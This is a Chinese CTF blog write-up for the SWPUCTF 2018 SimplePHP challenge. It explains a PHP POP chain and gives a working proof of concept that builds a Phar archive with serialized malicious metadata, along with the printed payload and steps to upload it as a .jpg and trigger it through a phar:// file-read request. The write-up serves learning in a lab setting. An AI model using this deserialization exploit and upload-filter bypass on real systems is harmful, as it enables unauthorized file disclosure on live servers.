[SWPUCTF 2018]SimplePHP--一道简单的Phar反序列化题目

于 2022-06-16 21:40:53 发布
阅读量997 收藏 2
点赞数 1
分类专栏: ctf 文章标签: 反序列化漏洞 Phar ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41401434/article/details/125323752
版权

复现环境:https://buuoj.cn/challenges#[SWPUCTF%202018]SimplePHP

题目就不贴了,直接给出利用链

①:echo会触发__toString魔术方法,所以这里的$this->test应该是Show类实例化的对象show

②:这里应该使$this->str['str']为Test类实例化后的对象test,然后test->source会触发__get魔术方法(因为Test类没有名为source的成员变量,所以会触发get魔术方法,并且$key=source)

③④:调用get方法,$key=source,$value=$this->params['source'],调用file_get读取$value中的内容并base64编码

⑤⑥⑦⑧:一路return,直到回到__destruct魔术方法,输出$value文件中的内容并base64编码后的结果

所以,$value也就是test->params['source']要赋值为flag的地址"/var/www/html/f1ag.php"

POC如下

<?php
class C1e4r
{
    public $test;
    public $str;
}

class Show
{
    public $source;
    public $str;
}
class Test
{
    public $file;
    public $params;
}

$c1e4r = new C1e4r();
$show = new Show();
$test = new Test();
$test->params['source'] = "/var/www/html/f1ag.php";
$c1e4r->str = $show; //触发__tostring
$show->str['str'] = $test;//触发__get;

$phar = new Phar("exp.phar"); 
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER(); ? >'); 
$phar->setMetadata($c1e4r); 
$phar->addFromString("exp.txt", "test"); 
$phar->stopBuffering();

其中生成的payload为:

O:5:"C1e4r":2:{ s:4:"test";N; s:3:"str"; O:4:"Show":2:{ s:6:"source";N; s:3:"str"; a:1:{s:3:"str"; O:4:"Test":2:{ s:4:"file";N;s:6:"params"; a:1:{s:6:"source";s:22:"/var/www/html/f1ag.php";} }}}}

最后,上传exp.phar(改后缀为jpg绕过过滤),在upload目录下看到上传文件名,构造

file.php?file=phar://upload/aa6de1f7ebf0130753f44a728c5ccf61.jpg

get请求得到base编码,解码获得flag

来自ctf小菜鸡的日常分享,欢迎各位大佬留言。

雨季丶
关注
专栏目录
BUUCTF [SWPUCTF 2018]SimplePHP
weixin_45441024的博客
12-01 1212
BUUCTF [SWPUCTF 2018]SimplePHP 打开题目我们很明显的看到了上传文件的板块和查看文件的板块,选择这个上传文件,显示如图 我们再选择查看文件的板块,url如图所示 我们在’='后面输入我们想要查看的文件,发现直接就给打印出来了,之后我们根据这个查看了几个php文件,得到了如下内容: file.php: <?php header("content-type:text/html;charset=utf-8"); include 'function.php'; inc
simplePHP Scripts-开源
05-01
总的来说,simplePHP Scripts为开发者提供了一种简单易用、无需数据库的Web开发选择,特别适合初学者和小规模项目。通过理解并运用这款开源工具,开发者可以更深入地了解PHP编程以及轻量级数据管理的方法。
[SWPUCTF 2018]SimplePHP
qq_50613938的博客
12-22 341
第一个点先找到文件,我们找找file.php 发现function.php和class.php 进去发现 发现提示 进入class.php,发现源码了 class C1e4r { public $test; public $str; public function __construct($name) { $this->str = $name; } public function __destruct() {
[SWPUCTF 2018]SimplePHP(phar反序列化)
paidx0
11-06 3180
首先看到是个文件上传,先看源码,源码里有个file.php?file= 可以读文件,简单的都看了一下,主要注意力放在 class.php 和 function.php function.php <?php //show_source(__FILE__); include "base.php"; header("Content-type: text/html;charset=utf-8"); error_reporting(0); function upload_file_do() { .
Linux文件操作
agoud44884的专栏
05-26 115
1)查看文件内容   more   filename   //通过敲回车方式逐行查看文件的内容,默认从第一行开始查看,不支持回看,q 退出查看   less   filename  //通过“上下左右”键查看文件的各个部分内容,支持回看,q退出   head -n filename  //查看文件的前n行内容   tail -n  filename  //查...
BUUCTF [SWPUCTF 2018]SimplePHP 1
weixin_45642610的博客
07-28 627
[SWPUCTF 2018]SimplePHP 1 这里主要记录下pop链生成的过程,其他解题过程看其他博客。 源class.php文件: <?php #class class C1e4r { public $test; public $str; public function __construct($name) { $this->str = $name; } public function __destruct() {
java企业oa源码-SimplePHP:简洁明了PHP框架,全面支持php5.3+
06-05
这是一个简单明了的框架,专为 php5.3+ 设计,具有完整的 OOP 支持。 我在准备毕业项目的时候,想找一个可以充分利用php5.3+新特性的php框架。 但是几乎所有的 php 框架都保持与较低版本的 php 兼容,所以我不能使用...
simplephp:使一切变得简单
02-14
"SimplePHP:使一切变得简单"是一个以PHP编程语言为基础的框架或库,旨在简化Web开发过程,提高开发效率。PHP是一种广泛使用的开源脚本语言,尤其适合于服务器端编程,用于创建动态交互式网站。它以其易学易用、灵活...
phar反序列化+两道CTF例题
unexpectedthing的博客
02-14 6927
Phar反序列化 phar文件本质上是一种压缩文件,会以序列化的形式存储用户自定义的meta-data。当受影响的文件操作函数调用phar文件时,会自动反序列化meta-data内的内容。(漏洞利用点) 什么是phar文件 在软件中,PHARPHP归档)文件是一种打包格式,通过将许多PHP代码文件和其他资源(例如图像,样式表等)捆绑到一个归档文件中来实现应用程序和库的分发 php通过用户定义和内置的“流包装器”实现复杂的文件处理功能。内置包装器可用于文件系统函数,如(fopen(),copy(),file
[SWPUCTF 2018]SimplePHP 1
weixin_46245411的博客
08-02 914
文章目录 一、获取源码 二、分析pop链 三、读取文件 总结 一、获取源码 开局三个页面,但是在“查看文件”部分发现网页在通过GET方式读取页面源码 试着读取“index.php” http://bbe726aa-c930-42b2-b1bc-e877e7cc731f.node4.buuoj.cn/file.php?file=index.php 同理,发现了新的PHP文件继续读取文件源码 总计6个页面:“function.php” "inde...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值